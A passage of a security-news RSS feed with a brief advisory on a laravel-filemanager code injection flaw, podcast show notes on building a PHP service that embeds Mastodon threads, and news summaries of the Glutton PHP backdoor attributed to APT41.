<description><![CDATA[A vulnerability classified as very critical has been found in UniSharp laravel-filemanager up to 2.9.0. This affects an unknown part. The manipulation leads to code injection.

This vulnerability is uniquely identified as CVE-2024-21546. It is possible to initiate the attack remotely. There is no...]]></description>
<link>https://tsecurity.de/de/2504388/sicherheitsluecken/cve-2024-21546-unisharp-laravel-filemanager-up-to-290-code-injection/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2504388/sicherheitsluecken/cve-2024-21546-unisharp-laravel-filemanager-up-to-290-code-injection/</guid>
<pubDate>Wed, 18 Dec 2024 08:07:27 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/?kb.risk">very critical</a> has been found in <a href="https://vuldb.com/?product.unisharp:laravel-filemanager">UniSharp laravel-filemanager up to 2.9.0</a>. This affects an unknown part. The manipulation leads to code injection.

This vulnerability is uniquely identified as <a href="https://vuldb.com/?source_cve.288819">CVE-2024-21546</a>. It is possible to initiate the attack remotely. There is no exploit available.

It is recommended to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[HPR4272: Embed Mastodon Threads]]></title>
<description><![CDATA[This show has been flagged as Clean by the host.
Episode 4 - Embed Mastodon
Threads
This is Episode 4 of the Plain Text Programs Podcast hosted at Hacker
Public Radio. As always I will include links with the show notes rather
than reading them on the podcast except there will be one exception to
...]]></description>
<link>https://tsecurity.de/de/2501850/podcasts/hpr4272-embed-mastodon-threads/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2501850/podcasts/hpr4272-embed-mastodon-threads/</guid>
<pubDate>Tue, 17 Dec 2024 01:04:05 +0100</pubDate>
<category>🎥 Podcasts</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>This show has been flagged as Clean by the host.</p>
<h2>Episode 4 - Embed Mastodon
Threads</h2>
<p>This is Episode 4 of the Plain Text Programs Podcast hosted at Hacker
Public Radio. As always I will include links with the show notes rather
than reading them on the podcast except there will be one exception to
that today, the link to my Plain Text Blog, home.gamerplus.org.</p>
<p>My blog and this podcast were my inspiration for writing the Embed
Mastodon Threads program. Besides posting the show notes at Hacker
Public Radio where they have a comments section I also post them at my
blog. Then I make a Mastodon post that includes a link to the show notes
on my blog and designate it as being the comment thread for that episode
of the podcast. I also post a link to the comment thread on Mastodon in
my show notes. Or at least I did in the past.</p>
<p>It came to mind that it would be nice to be able to display the
comment thread at the bottom of the blog post. So I made a Mastodon post
about this, and I quote.</p>
<blockquote>
<p>So here's my idea.</p>
<p>I want to use mastodon toots as a comment thread for my blog
posts.</p>
<p>At the bottom of the blog post I want to embed the toot and the
replies.</p>
<p>I can pull the toot id from the embed code.</p>
<p>Then I want to make a database query to get all the replies to that
toot.</p>
<p>Then I can generate the embed codes needed to show the toot and all
the replies.</p>
<p>I'm a mysql guy, not postgres. Also a Mastodon newb.</p>
<p>I want to know how to get the reply ids for a toot.</p>
<p>Any help, links, etc?</p>
<p>End quote.</p>
</blockquote>
<p>I immediately got responses from some programmers expressing interest
in the idea and giving good advice.</p>
<p>I did some research based on their suggestions. I had a good night's
sleep. And then I made another post in the morning. And I quote.</p>
<blockquote>
<p>Mastodon is so great.</p>
<p>I had this idea last night and fiddled around with it long enough to
realize I was doing it wrong.</p>
<p>So I made a post on Mastodon and almost immediately got help.</p>
<p>I found some good info on the Mastodon API.</p>
<p>I wake up this morning to more help and I found out about using curl
in php to make https requests.</p>
<p>Then a musician friend of mine who I've been following since before
Mastodon sends a working example, with code, in a javascript
environment.</p>
<p>And I've got a plan.</p>
<p>End quote.</p>
</blockquote>
<p>So credit where credit is due.</p>
<p>The programmers, gamers, and musicians helping me were:</p>
<p>Jeff the GenX Alien<br>
<span class="citation" data-cites="jeff">@jeff</span><span class="citation" data-cites="soapbox.hackdefendr.com">@soapbox.hackdefendr.com</span></p>
<p>EcksDy<br>
<span class="citation" data-cites="EcksDy">@EcksDy</span><span class="citation" data-cites="techtoots.com">@techtoots.com</span></p>
<p>Malin<br>
<span class="citation" data-cites="malin">@malin</span><span class="citation" data-cites="dice.camp">@dice.camp</span></p>
<p>and</p>
<p>Wayne Myers<br>
<span class="citation" data-cites="conniptions">@conniptions</span><span class="citation" data-cites="mastodon.social">@mastodon.social</span></p>
<p>Now, I've known Wayne Myers since before I was ever on Mastodon. We
share an interest in free culture music and I have played his songs on
my radio show, Something Blue, recorded by his band, Fit and the
Conniptions.</p>
<p>He sent some links in a couple of comments to other blogs that were
embedding Mastodon threads which confirmed that my idea could work.</p>
<p>Jeff the GenX Alien gave me some significant technical help. And I
quote.</p>
<blockquote>
<p>Use tootcli to learn everything you need to know about the inner
workings of Mastodon.</p>
<p><a href="https://github.com/ihabunek/toot" class="uri">https://github.com/ihabunek/toot</a></p>
<p>Whatever the API supports so does toot.</p>
<p>End quote.</p>
</blockquote>
<p>So I looked into tootcli and the Mastodon API and I realized that I
didn't need to access the database for my program, I could just use the
API.</p>
<p>So, thanks Jeff.</p>
<p>My second clue came from EcksDy. And I quote.</p>
<blockquote>
<p>I've got some help too. Using the Mastodon API and curl in php it
should be doable.</p>
<p>End quote.</p>
</blockquote>
<p>So then I started to research using curl in PHP to retrieve json data
from the Mastodon API and that's what I went with.</p>
<p>I set up a testbed and Malin chimed in with test results. He
continued to help with testing and ideas throughout the rest of the
project.</p>
<p>That's why Mastodon is so great! Way better than consulting an AI
bot.</p>
<p>So I had my work cut out for me. Here is where this program is like
my Plain Text Programs. I work hard, up front, until I am convinced that
I have an idea that will be easy to implement. This is much easier than
doing it the hard way first and then rewriting the program later after
it becomes difficult to maintain.</p>
<p>I said I had a plan. This was my plan.</p>
<p>Write a PHP program that will generate a webpage that can be embedded
in an iframe. This program will take a link as a parameter included in
the url.</p>
<p>Get that link from the Mastodon embed code for the parent post.</p>
<p>Use the API to retrieve the data associated with the parent post
including the replies.</p>
<p>Then generate the page by inserting the appropriate data into
Mastodon's existing embed structure.</p>
<p>That's kind of a broad framework but it certainly seemed doable. And
it was.</p>
<p>So first I wanted to make the API call so I could look at the
data.</p>
<p>I found this video by Alejandro AO.</p>
<p>How to easily create cURL API requests in PHP (Wordpress, Laravel,
Symfony) <a href="https://www.youtube.com/watch?v=iRLgEWMNA6w&amp;t=602s" class="uri">https://www.youtube.com/watch?v=iRLgEWMNA6w&amp;t=602s</a></p>
<p>He recommended that you use curl in the terminal to test your API
call. Then you use a web app called Curl-to-PHP to generate your PHP
code to make the same API call from your program.</p>
<p>My first time consuming stumbling block was what I call the problem
with the colon.</p>
<p>There are some great documents detailing the syntax for API calls
which I will link to in the show notes.</p>
<p>And where you are supposed to insert an id they show that as :id.</p>
<p>Like an idiot I thought the colon was part of the syntax, not as they
intended, a marker to indicate insert your id here. This is why I like
to see actual code examples in syntax documents.</p>
<p>Anyway I couldn't get it to work so I searched around until I found
some code examples and that turned on the lightbulb in my head.</p>
<p>Now I was able to make API calls using curl in the terminal. I copied
the working curl command and pasted it into the Curl-to-PHP website and
it output some code. And it worked! Which I was very glad about because
previous research into how to make API calls with PHP was confusing to
say the least. Sometimes PHP gifts you with and abundance of riches
which doesn't always make life easier.</p>
<p>So I made my API call from my program. The Curl-to-PHP code returned
$result. And then I used the json_decode command to turn the result
string into an array of Mastodon data.</p>
<p><code>$obj = json_decode($result, true);</code></p>
<p>And I could use the print_r command to look at that data.</p>
<p><code>print_r($obj);</code></p>
<p>I immediately put the print_r command at the bottom of my program
where it resides today as commented out debug code. This way while I was
looking at my program output I could just scroll down or search to find
what the actual data looked like.</p>
<p>So I fumbled around for a while before I figured out that I would
need the id and the url to make my idea work.</p>
<p>Accessing json data is reading an array. So easy peasy or maybe not.
This code returns the id of the reply from inside a while loop where $i
is the index.</p>
<p><code>$id = $obj['descendants'][$i]['id'];</code></p>
<p>Like I said, it looks easy now. Needless to say it took some head
scratching to figure out the exact syntax.</p>
<p>I used to be a mason and people would always ask me how I learned
masonry. I'd look them in the eye and say, "Trowel and error". There
was, in fact, a lot of trowel and error going on.</p>
<p>So then I generated the embed code to display each post and it
worked. For all of my posts. Not for replies from other servers.</p>
<p>So I scrolled down and examined the json data and I found the url
field that had all the info about the replies, server, username, and id.
So I picked up the url field the same way I picked up the id field and
updated my code with the url server and name.</p>
<p>This still didn't work. After staring at the json data for a while
the light finally dawned. The id I was using was the gamerplus id from
my server. The id I needed to use was in the url field from their
server.</p>
<p>Now that I had become enlightened it was easy to notice that the url
field contained the exact info that I needed to use in the embed.
Remember what I said about doing it the hard way before you replaced
that code with the easy way. That can happen even when you have a
plan.</p>
<p>So by using the url data in the embed I have less string handling and
fewer lines of code.</p>
<p>I went to bed and in the morning I made this post. And I quote. &gt;
&gt; I am able to pull the urls from the json call so that should solve
the missing comments issue. &gt; &gt; And then it comes down to the
issue of data structures. &gt; &gt; KISS &gt; &gt; I have decided, for
now, to display the comments in chronological order without concern for
whether a comment is a reply to the post or a reply to another comment.
&gt; &gt; A chronological list rather than a tree. &gt; &gt; Easy to
implement (kind of/relatively) and easy to understand. Also no indents.
&gt; &gt; This project will be licensed GPL so I am certainly open to
others applying other data structures to the data display. Everything
you need to display a tree is in the json. &gt; &gt; End quote.</p>
<p>So the data structure I needed is called a multidimensional array or
an array of arrays.</p>
<p>In terms of a database table it is two columns and a bunch of
rows.</p>
<p>In terms of PHP arrays it's an array where each element is an array
with two values in it, the id and the url. Now, in my case, the id is
from the gamerplus server. The url is from whatever server the replyer
calls home.</p>
<p>I initialize the array with the parent post.</p>
<p><code>$ids = array(array($id,$url));</code></p>
<p>You can see the nested arrays in the code.</p>
<p>Then I add items to the array like this.</p>
<p><code>$ids[] =  array($id,$url);</code></p>
<p>I access an array item like this.</p>
<pre><code>foreach($ids as $id) {
  $url = $id[1];</code></pre>
<p>The 1 refers to the second element of the array because programmers
start counting at 0.</p>
<p>Then using the url and the domain that I captured from the GET
parameter that passes the parent url into the program I build the iframe
embed for that post using the Mastodon embed as a template.</p>
<p>Which worked but the posts weren't displayed in chronological order.
Because the json data isn't necessarily in chronological order.</p>
<p>So I had to sort the multidimensional array on the id. Which isn't as
straight forward as the sort() command.</p>
<p>So I found this article on stackoverflow called</p>
<p><em>How do I sort a multidimensional array by one of the fields of
the inner array in PHP?</em></p>
<p>It had a two line solution that I modified to work with my array.</p>
<p>And now all my posts were in chronological order.</p>
<p>Stack Overflow code is licensed CC BY which is one way compatible
with the GPL. Just include the attribution in a comment.</p>
<p>My first post quoted above was posted on Friday, October 25, at 8:40
PM.</p>
<p>On Monday, October 28 at 8:52 PM I wrote, "Here's the blog post proof
of concept/working code."</p>
<p>Three days from "I have an idea" to "working code". That wasn't all I
did in those three days. Saturday I had a repertoire session with my
band, Jazz Buskers. Sunday I produced my radio show, Something Blue. But
when I'm in the middle of a programming project I get hyper focused.
Sometimes I have to force myself to step away.</p>
<p>And I have worked on the code a little bit today. And I will in the
future too. I did a lot of testing today and some Mastodon servers
and/or accounts just don't support embeds. But if you want to use Embed
Mastodon Threads on your blog or website your toot will probably be the
parent and if it works on your account, you're good.</p>
<p>Also posts from different servers look different. Sometimes the
background color is different. Sometimes the links look different.
Sometimes the whole post is a link to that post on Mastodon.</p>
<p>I decided to embrace that as a feature rather than a bug with the
different look making it easier to distinguish posts made on Gamer+ from
posts made on other servers.</p>
<p>I have uploaded Embed Mastodon Threads to home.gamerplus.org. At my
blog I have a post called Embed Mastodon Threads Hosted On Gamerplus
where I say, "The program is licensed GPL and I will put up a codeberg
repository so you can download it and install it wherever you want. But
feel free to use my server." And then I go into detail about just how to
do that in the embedded comments thread.</p>
<p>The program is 46 lines of code with 11 lines of comments including
attribution comments and debug code that is commented out. So 35 lines
of code. Over three days that's 12 lines of code a day. About double
normal expectations for a programmer.</p>
<p>This has been a long podcast, certainly longer than most of my
podcasts will be. But I wrote it right after I did the project and it
gave me an opportunity to discuss the development process. There were
many issues I had that I didn't mention but I think I hit the high
points.</p>
<p>Throughout the whole project I was posting to my threads on Mastodon
so that also helped me check back on the development history of this
three day project. The stream of boosts and replies from my compatriots
helped keep me going too.</p>
<p>It was a rush!</p>
<p>So this is not exactly a plain text program because it uses a
database accessed through the Mastodon API. Still, I do not have to
maintain that database, it's just there on every Mastodon instance,
ready to use.</p>
<p>Most of my plain text programs are web apps or web pages. This one is
a web service.</p>
<p>And it is simple to use. All you have to be able to do is copy the
embed code from Mastodon, extract the link, and paste the link into the
url that calls the web service. Then you put that url into an iframe on
your blog or web page.</p>
<p>I have a help page for using Embed Mastodon Threads in the same
directory as the thread.php program where you can generate and copy your
iframe code. In fact the help page is also a Plain Text Program which I
may talk about in a future podcast. On the help page are instructions on
how to get a link from the Mastodon embed code. Then you paste the link
into a form and hit submit. The page generates your iframe embed code
that you can use in your blog or web page. The page also displays what
the embedded thread will look like.</p>
<p>If you would rather download the code and install your own instance
of Embed Mastodon Threads I have a codeberg repository. Again all the
links are in the show notes at Hacker Public Radio and at my blog at
home.gamerplus.org.</p>
<p>If you have questions you can reply to a thread on Mastodon or email
me at hairylarry@deltaboogie.com. If you don't have a mastodon account
you can get one at gamerplus.org.</p>
<h2>Links</h2>
<ul>
<li><p>My Plain Text Blog<br>
<a href="https://home.gamerplus.org/" class="uri">https://home.gamerplus.org/</a></p></li>
<li><p>Embed Mastodon Threads Help Page<br>
<a href="https://home.gamerplus.org/Embed_Mastodon_Threads/" class="uri">https://home.gamerplus.org/Embed_Mastodon_Threads/</a></p></li>
<li><p>Codeberg Repository<br>
<a href="https://codeberg.org/hairylarry/EmbedMastodonThreads" class="uri">https://codeberg.org/hairylarry/EmbedMastodonThreads</a></p></li>
<li><p>From Jeff the GenX Alien<br>
Use tootcli to learn everything you need to know about the inner
workings of Mastodon.<br>
<a href="https://github.com/ihabunek/toot" class="uri">https://github.com/ihabunek/toot</a><br>
Whatever the API supports so does toot.</p></li>
<li><p>How to easily create cURL API requests in PHP (Wordpress,
Laravel, Symfony)<br>
<a href="https://www.youtube.com/watch?v=iRLgEWMNA6w&amp;t=602s" class="uri">https://www.youtube.com/watch?v=iRLgEWMNA6w&amp;t=602s</a></p></li>
<li><p>Curl-to-PHP<br>
<a href="https://incarnate.github.io/curl-to-php/" class="uri">https://incarnate.github.io/curl-to-php/</a></p></li>
<li><p>Playing with public data - Mastodon documentation<br>
<a href="https://docs.joinmastodon.org/client/public/" class="uri">https://docs.joinmastodon.org/client/public/</a></p></li>
<li><p>Status - Mastodon documentation<br>
<a href="https://docs.joinmastodon.org/entities/Status/" class="uri">https://docs.joinmastodon.org/entities/Status/</a></p></li>
<li><p>Context - Mastodon documentation<br>
<a href="https://docs.joinmastodon.org/entities/Context/" class="uri">https://docs.joinmastodon.org/entities/Context/</a></p></li>
<li><p>How do I sort a multidimensional array by one of the fields of
the inner array in PHP?<br>
<a href="https://stackoverflow.com/questions/2426917/how-do-i-sort-a-multidimensional-array-by-one-of-the-fields-of-the-inner-array-i" class="uri">https://stackoverflow.com/questions/2426917/how-do-i-sort-a-multidimensional-array-by-one-of-the-fields-of-the-inner-array-i</a></p></li>
<li><p>Embed Mastodon Threads Hosted On Gamerplus<br>
<a href="https://home.gamerplus.org/permalink.php?fname=Embed_Mastodon_Threads_Hosted_On_Gamerplus.txt" class="uri">https://home.gamerplus.org/permalink.php?fname=Embed_Mastodon_Threads_Hosted_On_Gamerplus.txt</a></p></li>
<li><p>Gamer+DBN Mastodon server<br>
<a href="https://gamerplus.org/" class="uri">https://gamerplus.org</a></p></li>
</ul>
<p><a href="https://hackerpublicradio.org/eps/hpr4272/index.html#comments">Provide <strong>feedback</strong> on this episode</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[New Glutton Malware Exploits Popular PHP Frameworks Like Laravel and ThinkPHP]]></title>
<description><![CDATA[Cybersecurity researchers have discovered a new PHP-based backdoor called Glutton that has been put to use in cyber attacks targeting China, the United States, Cambodia, Pakistan, and South Africa.
QiAnXin XLab, which discovered the malicious activity in late April 2024, attributed the previously...]]></description>
<link>https://tsecurity.de/de/2500326/it-security-nachrichten/new-glutton-malware-exploits-popular-php-frameworks-like-laravel-and-thinkphp/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2500326/it-security-nachrichten/new-glutton-malware-exploits-popular-php-frameworks-like-laravel-and-thinkphp/</guid>
<pubDate>Mon, 16 Dec 2024 11:33:31 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Cybersecurity researchers have discovered a new PHP-based backdoor called Glutton that has been put to use in cyber attacks targeting China, the United States, Cambodia, Pakistan, and South Africa.
QiAnXin XLab, which discovered the malicious activity in late April 2024, attributed the previously unknown malware with moderate confidence to the prolific Chinese nation-state group tracked Winnti (]]></content:encoded>
</item>
<item>
<title><![CDATA[Glutton: A New Modular PHP Backdoor]]></title>
<description><![CDATA[Glutton: A New Modular PHP Backdoor
				
				
			
			
				
				
				
				
			
				
				
				
				
				
				
				
				
				
				
				
				 Post Views: 1
			
			
				
				
				
				
				



			
			
				
				
				
				
			
				
				
				
				
				
				
				
				
				
				
				Join our Patreon Chan...]]></description>
<link>https://tsecurity.de/de/2500260/it-security-nachrichten/glutton-a-new-modular-php-backdoor/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2500260/it-security-nachrichten/glutton-a-new-modular-php-backdoor/</guid>
<pubDate>Mon, 16 Dec 2024 11:03:47 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="et_pb_section et_pb_section_0 et_section_specialty">
				
				
				
				
				
				<div class="et_pb_row">
				<div class="et_pb_column et_pb_column_3_4 et_pb_column_0   et_pb_specialty_column  et_pb_css_mix_blend_mode_passthrough">
				
				
				
				
				<div class="et_pb_row_inner et_pb_row_inner_0">
				<div class="et_pb_column et_pb_column_4_4 et_pb_column_inner et_pb_column_inner_0 et-last-child">
				
				
				
				
				<div class="et_pb_module et_pb_post_title et_pb_post_title_0 et_pb_bg_layout_light  et_pb_text_align_left">
				
				
				
				
				
				<div class="et_pb_title_container">
					<h1 class="entry-title">Glutton: A New Modular PHP Backdoor</h1>
				</div>
				
			</div>
			</div>
				
				
				
				
			</div><div class="et_pb_row_inner et_pb_row_inner_1">
				<div class="et_pb_column et_pb_column_4_4 et_pb_column_inner et_pb_column_inner_1 et-last-child">
				
				
				
				
				<div class="et_pb_module et_pb_text et_pb_text_0  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><p><strong><div class="post-views content-post post-282261 entry-meta load-static">
				<span class="post-views-icon dashicons dashicons-chart-bar"></span> <span class="post-views-label">Post Views:</span> <span class="post-views-count">1</span>
			</div></strong></p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_1  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><br>
<!-- News_Horizontal_smaller --><br>
<ins class="adsbygoogle" data-ad-client="ca-pub-6620833063853657" data-ad-slot="8337846400"></ins><br>
</div>
			</div>
			</div>
				
				
				
				
			</div><div class="et_pb_row_inner et_pb_row_inner_2 patreon-row">
				<div class="et_pb_column et_pb_column_4_4 et_pb_column_inner et_pb_column_inner_2 et-last-child">
				
				
				
				
				<div class="et_pb_module et_pb_text et_pb_text_2  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><h3 class="premium-content">Join our <a class="green_color" href="https://www.patreon.com/posts/maximizing-your-87671900" target="_blank" rel="noopener sponsored">Patreon</a> Channel and Gain access to 70+ Exclusive Walkthrough Videos.</h3></div>
			</div><div class="et_pb_module et_pb_image et_pb_image_0">
				
				
				
				
				<a href="https://www.patreon.com/posts/maximizing-your-87671900" target="_blank"><span class="et_pb_image_wrap "><img fetchpriority="high" decoding="async" width="800" height="120" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2023/11/Patreon.png" alt="Patreon" title="Patreon" srcset="https://www.blackhatethicalhacking.com/wp-content/uploads/2023/11/Patreon.png 800w, https://www.blackhatethicalhacking.com/wp-content/uploads/2023/11/Patreon-480x72.png 480w" sizes="(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) 800px, 100vw" class="wp-image-275956"></span></a>
			</div><div class="et_pb_module et_pb_divider et_pb_divider_0 et_pb_divider_position_ et_pb_space"><div class="et_pb_divider_internal"></div></div>
			</div>
				
				
				
				
			</div><div class="et_pb_row_inner et_pb_row_inner_3">
				<div class="et_pb_column et_pb_column_4_4 et_pb_column_inner et_pb_column_inner_3 et-last-child">
				
				
				
				
				<div class="et_pb_module et_pb_text et_pb_text_3  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner">Reading Time: 3 Minutes</div>
			</div>
			</div>
				
				
				
				
			</div><div class="et_pb_row_inner et_pb_row_inner_4">
				<div class="et_pb_column et_pb_column_4_4 et_pb_column_inner et_pb_column_inner_4 et-last-child">
				
				
				
				
				<div class="et_pb_module et_pb_text et_pb_text_4  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><p>Cybersecurity researchers have discovered a new PHP-based malware framework named <strong>Glutton</strong>, which has been deployed in attacks targeting China, the United States, Cambodia, Pakistan, and South Africa. This backdoor, <a href="https://blog.xlab.qianxin.com/glutton_stealthily_targets_mainstream_php_frameworks-en/" target="_blank" rel="noopener">identified</a> by QiAnXin XLab in April 2024, has been attributed with moderate confidence to the <strong>Chinese nation-state group Winnti (APT41)</strong>.</p>
<p>Interestingly, Glutton operates on a dual front—targeting both enterprise systems and cybercrime operators themselves. Researchers described this tactic as “poisoning operations,” where cybercriminal tools are turned against their creators, exemplifying the phrase <strong>“no honor among thieves.”</strong></p>
<h2><strong>Glutton’s Capabilities and Attack Chain</strong></h2>
<p>Glutton is a modular framework designed to infect PHP-based systems, harvest sensitive information, and deploy ELF backdoor components. Its infection chain begins with <strong>exploiting zero-day or N-day vulnerabilities</strong> and brute-forcing credentials. The attack then leverages several modules:</p>
<ol>
<li><strong>task_loader:</strong> Evaluates the environment and downloads components like <code>init_task</code>.</li>
<li><strong>init_task:</strong> Deploys an ELF backdoor disguised as FastCGI Process Manager (<code>/lib/php-fpm</code>) and infects PHP files with malicious code.</li>
<li><strong>client_loader:</strong> A refactored version of <code>init_task</code>, this module includes enhanced network infrastructure and modifies system files like <code>/etc/init.d/network</code> to ensure persistence.</li>
</ol>
<p>The backdoor infects popular PHP frameworks like <strong>Baota (BT), ThinkPHP, Yii,</strong> and <strong>Laravel</strong>, and facilitates code injection, file modifications, and data theft.</p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_5 see-also-text  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><p><strong>See Also: So, you want to be a hacker?<br>
</strong><strong><a href="https://www.blackhatethicalhacking.com/courses/" target="_blank" rel="noopener noreferrer">Offensive Security, Bug Bounty Courses</a></strong></p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_6  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><br>
<!-- News_Horizontal_smaller --><br>
<ins class="adsbygoogle" data-ad-client="ca-pub-6620833063853657" data-ad-slot="8337846400"></ins><br>
</div>
			</div><div class="et_pb_module et_pb_text et_pb_text_7  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><h4><span><strong>Discover your weakest link. Be proactive, not reactive. Cybercriminals need just one flaw to strike.</strong></span></h4>
<p><a href="https://www.blackhatethicalhacking.com/solutions/"><img decoding="async" class="alignnone wp-image-276050 size-full" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2023/11/Solutions.png" alt="" width="800" height="120" srcset="https://www.blackhatethicalhacking.com/wp-content/uploads/2023/11/Solutions.png 800w, https://www.blackhatethicalhacking.com/wp-content/uploads/2023/11/Solutions-480x72.png 480w" sizes="(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) 800px, 100vw"></a></p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_8  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><h2><strong>Advanced Features and Unique Tactics</strong></h2>
<p>Glutton’s framework is built for stealth and flexibility. Its key features include:</p>
<ul>
<li><strong>Command and Control (C2):</strong> Supports 22 unique commands for switching between TCP and UDP connections, launching shells, and executing PHP payloads.</li>
<li><strong>Stealthy Footprint:</strong> Executes all payloads within PHP or PHP-FPM processes, leaving no physical file traces on infected systems.</li>
<li><strong>Modular Payloads:</strong> Highly adaptable, capable of sequential or independent execution for extended attack capabilities.</li>
</ul>
<p>Notably, Glutton operators also infiltrate cybercrime forums to advertise compromised enterprise hosts with backdoors like <strong>l0ader_shell</strong>, weaponizing cybercriminal infrastructure to expand their reach.</p>
<p><img decoding="async" class="aligncenter" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLK35Yj9RZoNa-O2-oUhFaXYzMkyKp_r2bba5gbw_pXrTVPou8Yv6YNa52vkLKn-6jRhZoCtBg0HKTO0ST59jmoqUbALClYlWSoZHg19y9X9759VBi2E2gPCvImQ928xsIlFyvrRosZJNWgYMLVp1vAPql096Mk6nHY3vpellOwKRfJ5dkutBPjcs8415Y/s728-rw-e365/php.png"></p>
<h2><strong>Unusual Characteristics of Glutton</strong></h2>
<p>Despite its links to <strong>Winnti (APT41)</strong>, Glutton exhibits certain shortcomings atypical for the group:</p>
<ul>
<li><strong>Unencrypted Communications:</strong> Uses HTTP instead of HTTPS for payload delivery.</li>
<li><strong>Lack of Obfuscation:</strong> The code is devoid of stealth techniques commonly seen in advanced malware.</li>
<li><strong>Subpar Operational Security:</strong> Samples suggest a lower sophistication than typically associated with APT41.</li>
</ul>
<p>However, its similarity to Winnti’s <strong>PWNLNX tool</strong> and strategic focus on both white-hat and black-hat victims strongly aligns with their modus operandi.</p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_9 see-also-text  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><p><strong>Trending: <a href="https://www.blackhatethicalhacking.com/articles/essential-skills-every-hacker-should-master/" target="_blank" rel="noopener noreferrer">Essential Skills Every Hacker Should Master</a></strong></p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_10  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><br>
<!-- News Adsense Adcode Horizontal --><br>
<ins class="adsbygoogle" data-ad-client="ca-pub-6620833063853657" data-ad-slot="8337846400"></ins><br>
</div>
			</div><div class="et_pb_module et_pb_text et_pb_text_11 see-also-text  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><p><strong>Trending: <a href="https://www.blackhatethicalhacking.com/tools/exposor/" target="_blank" rel="noopener">Recon Tool: Exposor</a></strong></p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_12  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><h2><strong>Winnti’s Evolving Arsenal: From Glutton to Mélofée</strong></h2>
<p>The disclosure of Glutton follows XLab’s <a href="https://blog.xlab.qianxin.com/analysis_of_new_melofee_variant_en/" target="_blank" rel="noopener">report</a> on an updated APT41 malware variant called <strong>Mélofée</strong>, which incorporates an <strong>RC4-encrypted kernel driver</strong> for masking malicious activity. While Glutton primarily targets PHP-based systems, Mélofée is a <strong>Linux backdoor</strong> designed to execute stealthy commands and collect sensitive information.</p>
<p>With their combined functionality—spanning stealth, persistence, and exploitation of both enterprise and cybercriminal targets—<strong>APT41’s malware arsenal is evolving into a potent dual-threat.</strong></p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_13 see-also-text  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><p><strong>Trending: <a href="https://www.blackhatethicalhacking.com/news/exploiting-windows-ui-automation-a-new-stealthy-attack-vector/" target="_blank" rel="noopener noreferrer">Exploiting Windows UI Automation: A New Stealthy Attack Vector</a></strong></p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_14  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><blockquote><p><em>Are u a security researcher? Or a company that writes articles about Cyber Security, Offensive Security (related to information security in general) that match with our specific audience and is worth sharing? </em><em>If you want to express your idea in an article contact us here for a quote: <strong>info@blackhatethicalhacking.com</strong></em></p></blockquote></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_15  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><p><strong><em>Source: thehackernews.com</em></strong></p>
<p><a href="https://thehackernews.com/2024/12/new-glutton-malware-exploits-popular.html" target="_blank" rel="noopener"><strong>Source Link</strong></a></p></div>
			</div><div class="et_pb_module et_pb_divider et_pb_divider_1 et_pb_divider_position_ et_pb_space"><div class="et_pb_divider_internal"></div></div><div class="et_pb_module et_pb_image et_pb_image_1 store-img">
				
				
				
				
